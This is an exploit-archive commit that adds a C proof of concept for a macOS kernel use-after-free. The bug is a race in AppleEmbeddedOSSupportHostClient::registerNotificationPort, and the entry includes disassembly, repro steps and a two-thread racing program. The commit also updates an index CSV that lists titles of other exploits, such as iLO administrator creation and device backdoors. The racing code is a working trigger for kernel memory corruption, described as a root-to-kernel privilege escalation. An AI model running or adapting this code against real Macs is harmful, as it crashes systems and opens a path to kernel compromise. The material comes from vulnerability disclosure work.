DB: 2018-02-10

1 changes to exploits/shellcodes macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort' HPE iLO4 < 2.53 - Add New Administrator User HPE iLO 4 < 2.53 - Add New Administrator User
2018-02-10 05:01:52 +00:00 · 2018-02-10 05:01:52 +00:00 · 145dac58fb
commit 145dac58fb
parent 79b9c08b88
2 changed files with 152 additions and 1 deletions
--- a/exploits/macos/dos/44007.c
+++ b/exploits/macos/dos/44007.c
@ -0,0 +1,150 @@
+/*
+AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models.
+
+Here's the userclient's registerNotificationPort method:
+
+__text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *, unsigned int, unsigned int)
+__text:0000000000002DE4                 push    rbp
+__text:0000000000002DE5                 mov     rbp, rsp
+__text:0000000000002DE8                 push    r14
+__text:0000000000002DEA                 push    rbx
+__text:0000000000002DEB                 mov     r14, rsi
+__text:0000000000002DEE                 mov     rbx, rdi
+__text:0000000000002DF1                 mov     rdi, [rbx+0E8h]
+__text:0000000000002DF8                 test    rdi, rdi
+__text:0000000000002DFB                 jz      short loc_2E0D
+__text:0000000000002DFD                 call    __ZN12IOUserClient23releaseNotificationPortEP8ipc_port ; IOUserClient::releaseNotificationPort(ipc_port *)
+__text:0000000000002E02                 mov     qword ptr [rbx+0E8h], 0
+__text:0000000000002E0D
+__text:0000000000002E0D loc_2E0D:                               ; CODE XREF: AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *,uint,uint)+17j
+__text:0000000000002E0D                 mov     [rbx+0E8h], r14
+__text:0000000000002E14                 xor     eax, eax
+__text:0000000000002E16                 pop     rbx
+__text:0000000000002E17                 pop     r14
+__text:0000000000002E19                 pop     rbp
+__text:0000000000002E1A                 retn
+
+The IOUserClient superclass doesn't implement any locking for this method; it's up to the user client itself to correctly prevent
+dangerous concurrent accesses.
+
+By calling registerNotificationPort in two threads in parallel we can cause a AppleEmbeddedOSSupportHostClient to drop two references on a port when 
+it only holds one.
+
+Note that AppleEmbeddedOSSupportHostClient is only reachable by root so this is a root -> kernel priv esc.
+
+Repro like this: while true; do ./embedded_host; done
+
+Please test on a machine which has a touchbar!
+ > kextstat | grep AppleEmbeddedOSSupport
+should display something if it does.
+*/
+
+// ianbeer
+#if 0
+MacOS kernel uaf due to lack of locking in AppleEmbeddedOSSupportHostClient::registerNotificationPort
+
+AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models.
+
+Here's the userclient's registerNotificationPort method:
+
+__text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *, unsigned int, unsigned int)
+__text:0000000000002DE4                 push    rbp
+__text:0000000000002DE5                 mov     rbp, rsp
+__text:0000000000002DE8                 push    r14
+__text:0000000000002DEA                 push    rbx
+__text:0000000000002DEB                 mov     r14, rsi
+__text:0000000000002DEE                 mov     rbx, rdi
+__text:0000000000002DF1                 mov     rdi, [rbx+0E8h]
+__text:0000000000002DF8                 test    rdi, rdi
+__text:0000000000002DFB                 jz      short loc_2E0D
+__text:0000000000002DFD                 call    __ZN12IOUserClient23releaseNotificationPortEP8ipc_port ; IOUserClient::releaseNotificationPort(ipc_port *)
+__text:0000000000002E02                 mov     qword ptr [rbx+0E8h], 0
+__text:0000000000002E0D
+__text:0000000000002E0D loc_2E0D:                               ; CODE XREF: AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *,uint,uint)+17j
+__text:0000000000002E0D                 mov     [rbx+0E8h], r14
+__text:0000000000002E14                 xor     eax, eax
+__text:0000000000002E16                 pop     rbx
+__text:0000000000002E17                 pop     r14
+__text:0000000000002E19                 pop     rbp
+__text:0000000000002E1A                 retn
+
+The IOUserClient superclass doesn't implement any locking for this method; it's up to the user client itself to correctly prevent
+dangerous concurrent accesses.
+
+By calling registerNotificationPort in two threads in parallel we can cause a AppleEmbeddedOSSupportHostClient to drop two references on a port when 
+it only holds one.
+
+Note that AppleEmbeddedOSSupportHostClient is only reachable by root so this is a root -> kernel priv esc.
+
+Repro like this: while true; do ./embedded_host; done
+
+Please test on a machine which has a touchbar!
+ > kextstat | grep AppleEmbeddedOSSupport
+should display something if it does.
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+
+#include <mach/mach.h>
+#include <mach/host_priv.h>
+
+#include <IOKit/IOKitLib.h>
+
+mach_port_t q() {
+  mach_port_t p = MACH_PORT_NULL;
+  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p);
+  mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
+  return p;
+}
+
+volatile int start = 0;
+volatile mach_port_t conn;
+
+void* racer(void* arg) {
+  while(!start){;}
+	IOConnectSetNotificationPort(conn, 0, MACH_PORT_NULL, 0);
+  return NULL;
+}
+
+
+
+int main() {
+	kern_return_t err;
+  io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleEmbeddedOSSupportHost"));
+
+  if (service == IO_OBJECT_NULL){
+    printf("unable to find service\n");
+    return 0;
+  }
+
+  conn = MACH_PORT_NULL;
+  err = IOServiceOpen(service, mach_task_self(), 0, &conn);
+  if (err != KERN_SUCCESS){
+    printf("unable to get user client connection\n");
+    return 0;
+  }
+
+  mach_port_t p = q();
+
+	IOConnectSetNotificationPort(conn, 0, p, 0);
+
+  //mach_port_destroy(mach_task_self(), p);
+  // kernel holds the only ref
+
+
+  int n_threads = 2;
+  pthread_t threads[n_threads];
+  for(uint32_t i = 0; i < n_threads; i++) {
+    pthread_create(&threads[i], NULL, racer, NULL);
+  }
+
+  start = 1;
+
+  for(uint32_t i = 0; i < n_threads; i++) {
+    pthread_join(threads[i], NULL);
+	}
+
+  return 0;
+}
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5492,6 +5492,7 @@ id,file,description,date,author,type,platform,port
 43992,exploits/multiple/dos/43992.py,"Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption",2018-02-07,"Juan Sacco",dos,multiple,2000
 43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android,
 43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple,
+44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos,
 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1  - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@ -16006,7 +16007,7 @@ id,file,description,date,author,type,platform,port
 44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,
 44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple,
 44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
-44005,exploits/multiple/remote/44005.py,"HPE iLO4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
+44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22